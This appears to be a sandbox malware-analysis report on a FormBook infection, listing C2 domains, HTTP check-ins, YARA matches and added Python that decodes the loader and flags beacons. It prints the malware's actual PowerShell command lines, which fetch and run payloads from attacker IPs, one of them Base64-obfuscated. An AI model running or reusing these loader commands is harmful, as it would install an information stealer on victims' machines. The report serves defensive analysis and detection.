Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.prostitutkitambovasuck.infoReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.shref94.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.shref94.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.shref94.com/s4ig/www.deadsdradqueer.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.shref94.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sushifactoryamphawa.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sushifactoryamphawa.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sushifactoryamphawa.com/s4ig/www.mgav21.xyz
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sushifactoryamphawa.comReferer:
Source: powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.435103706.000001DF00212000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.404888113.000001FD1CABB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.446583426.00000181B5F6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.406922081.000001FD2B5D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.447539481.00000181C4A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000006.00000002.893555318.0000000002B62000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.mgydez.site/s4ig/?0tx=dCXC
Source: explorer.exe, 00000006.00000002.893555318.0000000002B62000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 0000002D.00000000.800415713.0000000004A42000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: explorer.exe, 0000002D.00000000.800415713.0000000004A42000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.sushifactoryamphawa.com/s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG
Source: unknown DNS traffic detected: queries for: www.nexusbalance.com
Source: C:\Windows\explorer.exe Code function: 6_2_043F3A52 getaddrinfo,setsockopt,recv, 6_2_043F3A52
Source: global traffic HTTP traffic detected: GET /daveCrpted.jpg HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: 2.56.57.22 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1 | Host: 20.106.232.4 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1 | Host: 20.106.232.4
Source: global traffic HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1 | Host: 2.56.57.22 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=cD7SGqgsMdn1qG9AyDMlGxGbikkTJ3e+SLNAYG8XHeGes8xhGajuA9PSV6Vq4uulpQsNka3DRA== HTTP/1.1 | Host: www.nexusbalance.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /s4ig/?0tx=EE1KxreShStuWGRfOzXQivmJYb01nsHN4Y+USZVKUNF8o5M6FFhEbiUBXOrRFrwbnBV3ymr95w==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1 | Host: www.choicearticleto-readtoday.info | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG+zKIyPgsbPq7aByYUb53Y7vFTrhhhVYwgCqKyQGNMMvVk3uDgUSApaDProA7A9idTtJxA== HTTP/1.1 | Host: www.sushifactoryamphawa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /s4ig/?0tx=dCXC+2ZT0QRaPMB/1bkCzyFCQOsWt/uhEcdMypxrEdi7eXd+jvTokAesL3IOP6QRIKOYlLryUQ==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1 | Host: www.mgav21.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: C:\Windows\explorer.exe Code function: 6_2_043ECEB2 OpenClipboard, 6_2_043ECEB2
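The four GET requests to the /s4ig/ path above share a shape that is worth encoding as a check: no User-Agent, Connection: close, a GET that carries a 7-byte all-NUL body, a two-parameter query in which one value is a long Base64-like blob, and a short bare directory as the path. The Python below is an added example, not part of this report or of the sandbox tooling; its input is a constructed list built from the request lines above (request line and header fields joined with " | "), and the indicator names, the scoring and the threshold of three are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input: the HTTP requests listed in this report, each as one
# record with the request line and header fields joined by " | " (the Data Raw
# field carries the request body as hex). The four /s4ig/ requests are the
# FormBook check-ins; the other four belong to the PowerShell loader chain.
SAMPLE_REQUESTS = [
    "GET /daveCrpted.jpg HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: 2.56.57.22 | Connection: Keep-Alive",
    "GET /dll/26-05-2022-StartUp.pdf HTTP/1.1 | Host: 20.106.232.4 | Connection: Keep-Alive",
    "GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1 | Host: 20.106.232.4",
    "GET /tsdfguhijk.txt HTTP/1.1 | Host: 2.56.57.22 | Connection: Keep-Alive",
    "GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=cD7SGqgsMdn1qG9AyDMlGxGbikkTJ3e+SLNAYG8XHeGes8xhGajuA9PSV6Vq4uulpQsNka3DRA== HTTP/1.1 | Host: www.nexusbalance.com | Connection: close | Data Raw: 00 00 00 00 00 00 00",
    "GET /s4ig/?0tx=EE1KxreShStuWGRfOzXQivmJYb01nsHN4Y+USZVKUNF8o5M6FFhEbiUBXOrRFrwbnBV3ymr95w==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1 | Host: www.choicearticleto-readtoday.info | Connection: close | Data Raw: 00 00 00 00 00 00 00",
    "GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG+zKIyPgsbPq7aByYUb53Y7vFTrhhhVYwgCqKyQGNMMvVk3uDgUSApaDProA7A9idTtJxA== HTTP/1.1 | Host: www.sushifactoryamphawa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00",
    "GET /s4ig/?0tx=dCXC+2ZT0QRaPMB/1bkCzyFCQOsWt/uhEcdMypxrEdi7eXd+jvTokAesL3IOP6QRIKOYlLryUQ==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1 | Host: www.mgav21.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00",
]

# Assumed thresholds: a Base64-looking value of 40+ characters, a path that is
# one short directory and nothing else.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SHORT_DIR = re.compile(r"/[A-Za-z0-9]{3,6}/")


def parse_record(record: str) -> dict:
    """Split one record into method, path, query pairs, lower-cased headers and body bytes."""
    fields = [f.strip() for f in record.split(" | ")]
    method, target, _version = fields[0].split(" ", 2)
    headers, body = {}, b""
    for field in fields[1:]:
        name, _, value = field.partition(":")
        if name.strip().lower() == "data raw":
            body = bytes.fromhex(value.strip())
        else:
            headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    # Split the query by hand: parse_qsl would turn the '+' inside a Base64 value into a space.
    query = [kv.split("=", 1) if "=" in kv else [kv, ""] for kv in url.query.split("&") if kv]
    return {"method": method, "path": url.path, "query": query, "headers": headers, "body": body}


def beacon_indicators(req: dict) -> list[str]:
    """Traits the /s4ig/ check-ins in this report share; each one alone is weak evidence."""
    hits = []
    if "user-agent" not in req["headers"]:
        hits.append("no User-Agent header")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("Connection: close")
    if req["method"] == "GET" and req["body"]:
        all_nul = not req["body"].strip(b"\x00")
        hits.append(f"GET carrying a {len(req['body'])}-byte body ({'all NUL' if all_nul else 'mixed'})")
    if len(req["query"]) == 2 and any(B64_BLOB.fullmatch(v) for _, v in req["query"]):
        hits.append("two-parameter query with a long Base64-like value")
    if SHORT_DIR.fullmatch(req["path"]):
        hits.append("short bare directory path")
    return hits


def find_beacons(records: list[str], threshold: int = 3) -> list[tuple[str, str, list[str]]]:
    """Return (host, path, reasons) for every record that reaches the indicator threshold."""
    found = []
    for record in records:
        req = parse_record(record)
        hits = beacon_indicators(req)
        if len(hits) >= threshold:
            found.append((req["headers"].get("host", ""), req["path"], hits))
    return found


if __name__ == "__main__":
    for host, path, why in find_beacons(SAMPLE_REQUESTS):
        print(f"{host}{path}: {', '.join(why)}")
```

Run against the constructed list, the four /s4ig/ requests reach all five indicators and the loader downloads score at most one (the missing User-Agent), so the threshold separates the two groups without relying on the domain names, which rotate across the sixteen hosts listed in memory above.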

E-Banking Fraud

Source: Yara match File source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.powershell.exe.181ccfb0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 12.2.powershell.exe.181b4def050.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.powershell.exe.181b586e7e0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.451218272.00000181CCFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects known downloader agent Author: ditekSHen
Source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: Process Memory Space: powershell.exe PID: 2328, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm *.vbs,*.wsf
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
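The second wscript.exe to powershell.exe command line above never shows the stage it runs: $iUqm is Base64 of UTF-16LE text in which every U was swapped for ???, and the script restores it with .replace('???','U') before decoding. The Python below, added here as an example and not part of the sandbox report, reproduces that decoding offline on the string copied from the command line and pulls out the next-stage indicators: the download URL, the assembly entry point, and the reversed URL that is passed to Run.

```python
import base64
import re

# The obfuscated $iUqm value, copied verbatim from the wscript.exe -> powershell.exe
# command line in this report. The loader restores it with .replace('???','U').
IUQM = (
    "WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIA"
    "dABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???A"
    "YwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkA"
    "bgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYA"
    "LQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???A"
    "bQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8A"
    "YQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgA"
    "bwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkA"
    "bgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4A"
    "awBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA="
)


def decode_stage(encoded: str, placeholder: str = "???", letter: str = "U") -> str:
    """Undo the loader's two layers: placeholder substitution, then Base64 of UTF-16LE
    text (which is what [System.Text.Encoding]::Unicode.GetString expects)."""
    raw = base64.b64decode(encoded.replace(placeholder, letter), validate=True)
    return raw.decode("utf-16-le")


def extract_iocs(script: str) -> dict:
    """Pull the next-stage indicators out of the decoded PowerShell text."""
    urls = re.findall(r"https?://[^\s'\"()]+", script)
    # The string handed to the loaded assembly's Run() is a URL written backwards.
    reversed_urls = [s[::-1] for s in re.findall(r"'([^']*//:s?ptth)'", script)]
    type_name = re.search(r"GetType\('([^']+)'\)", script)
    method = re.search(r"GetMethod\('([^']+)'\)", script)
    return {
        "download_urls": urls,
        "run_argument_urls": reversed_urls,
        "entry_type": type_name.group(1) if type_name else None,
        "entry_method": method.group(1) if method else None,
    }


if __name__ == "__main__":
    stage2 = decode_stage(IUQM)
    print(stage2)
    for key, value in extract_iocs(stage2).items():
        print(f"{key}: {value}")
```

The decoded stage fetches http://20.106.232.4/dll/26-05-2022-StartUp.pdf with DownloadString, Base64-decodes the body into a byte array, loads it with [System.AppDomain]::CurrentDomain.Load and invokes the static Run method of type ddscfIvqgW.HoNYlDROLP, passing it 'txt.kjihugfdst/22.75.65.2//:ptth'; reversed, that is http://2.56.57.22/tsdfguhijk.txt, the second request to 2.56.57.22 in the traffic list above. The SUSP_Reversed_Base64_Encoded_EXE match on powershell.exe memory below is consistent with that "pdf" being a reversed, Base64-encoded executable rather than a document. In the first command line, wget is Windows PowerShell's alias for Invoke-WebRequest and -o binds to -OutFile, so daveCrpted.jpg is written to C:\Windows\Temp\Done.vbs and launched through explorer.exe before the script deletes the .vbs and .wsf files.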
Source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
